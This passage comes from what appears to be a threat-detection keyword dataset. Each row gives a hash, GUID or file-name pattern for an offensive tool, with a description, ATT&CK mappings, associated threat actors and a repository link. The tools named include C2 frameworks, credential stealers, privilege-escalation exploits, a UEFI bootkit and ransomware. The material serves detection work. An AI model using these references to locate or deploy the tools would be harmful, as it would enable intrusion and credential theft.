T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","42928" "*EF143476-E53D-4C39-8DBB-A6AC7883236C*",".{0,1000}EF143476\-E53D\-4C39\-8DBB\-A6AC7883236C.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#GUIDproject","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","42931" "*ef1d610dd78efae3dfa2eebade2ee76882b7e2b5df140aa068e25519d800bc63*",".{0,1000}ef1d610dd78efae3dfa2eebade2ee76882b7e2b5df140aa068e25519d800bc63.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - 
T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","42932" "*ef1d610dd78efae3dfa2eebade2ee76882b7e2b5df140aa068e25519d800bc63*",".{0,1000}ef1d610dd78efae3dfa2eebade2ee76882b7e2b5df140aa068e25519d800bc63.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","42933" "*ef2eab4d2badc48463192b2eef76faf323389acd8622270e16e473a26bed88c8*",".{0,1000}ef2eab4d2badc48463192b2eef76faf323389acd8622270e16e473a26bed88c8.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","42937" "*ef377470d920bdd421679da6fa7dd8a4cd7445b22db2829419dd62be97131583*",".{0,1000}ef377470d920bdd421679da6fa7dd8a4cd7445b22db2829419dd62be97131583.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42938" "*ef3a5ae6f4d510f340b4b9bce3a7aa502ffeadbf09f37dacb0c8bf00a49d36d0*",".{0,1000}ef3a5ae6f4d510f340b4b9bce3a7aa502ffeadbf09f37dacb0c8bf00a49d36d0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42941" "*ef3b03b91b7779e6ff07bacd3921a4851458c58281ac77195d3c20da19261b22*",".{0,1000}ef3b03b91b7779e6ff07bacd3921a4851458c58281ac77195d3c20da19261b22.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","42942" "*ef3eb0e2dc2a3be441eef0bdc97eb16eb311187a6387f3e757eb0569795dcc41*",".{0,1000}ef3eb0e2dc2a3be441eef0bdc97eb16eb311187a6387f3e757eb0569795dcc41.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","42945" "*ef3fe4db61ac701cf542985aa1ad4f82efba10cafe9a9e5a1383633cac249005*",".{0,1000}ef3fe4db61ac701cf542985aa1ad4f82efba10cafe9a9e5a1383633cac249005.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42946" "*ef573db5da42f05fee1e9ecc1d8c53690293d2053127978a092172fa9ce864f3*",".{0,1000}ef573db5da42f05fee1e9ecc1d8c53690293d2053127978a092172fa9ce864f3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42949" 
"*ef5bf46dc35dcb1881a81107214ba85cafd4b3eb76e8a68b32005e9dd44d1371*",".{0,1000}ef5bf46dc35dcb1881a81107214ba85cafd4b3eb76e8a68b32005e9dd44d1371.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42950" "*ef62b7afc565b06ed3c0a764f927ce9ccdc376c569c74c4c8ff1c977d89ef15e*",".{0,1000}ef62b7afc565b06ed3c0a764f927ce9ccdc376c569c74c4c8ff1c977d89ef15e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42951" "*ef644b1554eb1561456e7e20b136f4fff16c3a02e821d06da3c3a6dd9aa168bc*",".{0,1000}ef644b1554eb1561456e7e20b136f4fff16c3a02e821d06da3c3a6dd9aa168bc.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","42952" "*ef71783c18624e5c80cae1b445b545eefa0338e7736b0c5e9272f6dad1cb7092*",".{0,1000}ef71783c18624e5c80cae1b445b545eefa0338e7736b0c5e9272f6dad1cb7092.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","42954" "*ef881142422dd10c7ad27424ce2407312b3886c5ee940a4be17153caed6ccaff*",".{0,1000}ef881142422dd10c7ad27424ce2407312b3886c5ee940a4be17153caed6ccaff.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","#filehash","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","42957" "*ef8eb970940d435e07001fccf2ac210f539a9bb09ea1ef146c5f6ff4cc15a402*",".{0,1000}ef8eb970940d435e07001fccf2ac210f539a9bb09ea1ef146c5f6ff4cc15a402.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42958" "*ef91e64b9cf910f90b8a075c87721bb46ab13cc6845697bb06c0754a98378728*",".{0,1000}ef91e64b9cf910f90b8a075c87721bb46ab13cc6845697bb06c0754a98378728.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42959" "*ef98c122f795f0c0d7719fc02825df198cdd373ba56e17940d28ffaf13f5fce3*",".{0,1000}ef98c122f795f0c0d7719fc02825df198cdd373ba56e17940d28ffaf13f5fce3.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","42960" "*ef9bce2a5c2f623419be05c9090187cba082a208f7685bd93c349fe71cbad896*",".{0,1000}ef9bce2a5c2f623419be05c9090187cba082a208f7685bd93c349fe71cbad896.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42961" "*ef9c57ffe31d8ceeb51daeac466dc8835807ab7d9fd3ff05ada8ce9b4836d924*",".{0,1000}ef9c57ffe31d8ceeb51daeac466dc8835807ab7d9fd3ff05ada8ce9b4836d924.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","#filehash","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","42962" "*ef9e7ebeb7525e99f2499e07aa6313e65f23047b40f6b5ddad6f5ca5dac9a4a5*",".{0,1000}ef9e7ebeb7525e99f2499e07aa6313e65f23047b40f6b5ddad6f5ca5dac9a4a5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42964" "*efa66f6391ec471ca52cd053159c8a8778f11f921da14e6daf76387f8c9afcd5*",".{0,1000}efa66f6391ec471ca52cd053159c8a8778f11f921da14e6daf76387f8c9afcd5.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt 
Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#filehash","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","42968" "*efaca1f25f45be0e5e1dc4dc4e8827049457bbc725a4779ccf9a4a71e1763aa7*",".{0,1000}efaca1f25f45be0e5e1dc4dc4e8827049457bbc725a4779ccf9a4a71e1763aa7.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","42969" "*efb9e62e4e669c34fb75f1b1c7ae27911bf6ea022f0094d4c7c33ee8c38897e6*",".{0,1000}efb9e62e4e669c34fb75f1b1c7ae27911bf6ea022f0094d4c7c33ee8c38897e6.{0,1000}","offensive_tool_keyword","hotkeyz","Hotkey-based keylogger for Windows","T1056.001","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/yo-yo-yo-jbo/hotkeyz","1","0","#filehash","N/A","9","1","21","1","2024-10-17T17:50:19Z","2024-06-03T21:23:16Z","42973" "*efbf6ef9b05be315a4538f28b30a17bc2de051598ecb5cfd45903b1c2fdbcb73*",".{0,1000}efbf6ef9b05be315a4538f28b30a17bc2de051598ecb5cfd45903b1c2fdbcb73.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42974" "*efbglgofoippbgcjepnhiblaibcnclgk*",".{0,1000}efbglgofoippbgcjepnhiblaibcnclgk.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","42975" "*efc8c949a728d819ac20e7f03b2ceb9924a51b10130de46424a27d4bbf242b9a*",".{0,1000}efc8c949a728d819ac20e7f03b2ceb9924a51b10130de46424a27d4bbf242b9a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42977" "*efchatz/pandora*",".{0,1000}efchatz\/pandora.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","1","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","42978" "*efd24e7507ef6865e7f04947fd3a18903fa8368355569ec32376d921ba2c1934*",".{0,1000}efd24e7507ef6865e7f04947fd3a18903fa8368355569ec32376d921ba2c1934.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42980" "*efd837fd57626e278a65c495567160835dc8ddb29675c71c68c676e57bdc9b98*",".{0,1000}efd837fd57626e278a65c495567160835dc8ddb29675c71c68c676e57bdc9b98.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42981" 
"*efe42a7eb08755abbb5c91b36ead35cdafbd82d1e34016046cb4be5861cb2053*",".{0,1000}efe42a7eb08755abbb5c91b36ead35cdafbd82d1e34016046cb4be5861cb2053.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","#filehash","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","42983" "*EFE50F0BE7CE12CB062816896427A3E1CD8B025CA218805C321882AB33520E4D*",".{0,1000}EFE50F0BE7CE12CB062816896427A3E1CD8B025CA218805C321882AB33520E4D.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","42984" "*efe57ef897c458aef4650ca14d21160c6e685441c0b71de67b22cbe19d4ca3f1*",".{0,1000}efe57ef897c458aef4650ca14d21160c6e685441c0b71de67b22cbe19d4ca3f1.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","42985" "*efe57ef897c458aef4650ca14d21160c6e685441c0b71de67b22cbe19d4ca3f1*",".{0,1000}efe57ef897c458aef4650ca14d21160c6e685441c0b71de67b22cbe19d4ca3f1.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities 
like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","42986" "*eff1f6144cbc0b092a09dc06009fc3709c937347d9b5991560588204fc183414*",".{0,1000}eff1f6144cbc0b092a09dc06009fc3709c937347d9b5991560588204fc183414.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","#filehash","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","42988" "*eff4aa3e27c98422705a19de82c1386d11b9559ded06eed46c26ab82860c0a81*",".{0,1000}eff4aa3e27c98422705a19de82c1386d11b9559ded06eed46c26ab82860c0a81.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42989" "*eff99cabfd57fe3076ee55bc66dd96af5750307b7766234ccb1327b6ccde47ae*",".{0,1000}eff99cabfd57fe3076ee55bc66dd96af5750307b7766234ccb1327b6ccde47ae.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42991" "*eff99cabfd57fe3076ee55bc66dd96af5750307b7766234ccb1327b6ccde47ae*",".{0,1000}eff99cabfd57fe3076ee55bc66dd96af5750307b7766234ccb1327b6ccde47ae.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42992" "*eff99cabfd57fe3076ee55bc66dd96af5750307b7766234ccb1327b6ccde47ae*",".{0,1000}eff99cabfd57fe3076ee55bc66dd96af5750307b7766234ccb1327b6ccde47ae.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42993" "*effc137c4e7594fc3b3b5240c786ba3351e521bb7f9d14883dca6ff9db5f5f28*",".{0,1000}effc137c4e7594fc3b3b5240c786ba3351e521bb7f9d14883dca6ff9db5f5f28.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42994" "*EFFE3048-E904-48FD-B8C0-290E8E9290FB*",".{0,1000}EFFE3048\-E904\-48FD\-B8C0\-290E8E9290FB.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","42995" "*EfiDSEFix.exe *",".{0,1000}EfiDSEFix\.exe\s.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","42996" "*EFIGUARD_BACKDOOR_VARIABLE_NAME*",".{0,1000}EFIGUARD_BACKDOOR_VARIABLE_NAME.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","42997" "*EfiGuard-v1.1.zip*",".{0,1000}EfiGuard\-v1\.1\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","42998" "*EfiGuard-v1.2.zip*",".{0,1000}EfiGuard\-v1\.2\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","42999" "*EfiGuard-v1.3.zip*",".{0,1000}EfiGuard\-v1\.3\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","43000" "*EfiGuard-v1.4.zip*",".{0,1000}EfiGuard\-v1\.4\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - 
T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","43001" "*EfiGuard-v1.5.zip*",".{0,1000}EfiGuard\-v1\.5\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","43002" "*EfsPotato-*.exe*",".{0,1000}EfsPotato\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","43003" "*EfsPotato*efsrpc*",".{0,1000}EfsPotato.{0,1000}efsrpc.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","43004" "*EfsPotato*lsarpc*",".{0,1000}EfsPotato.{0,1000}lsarpc.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR 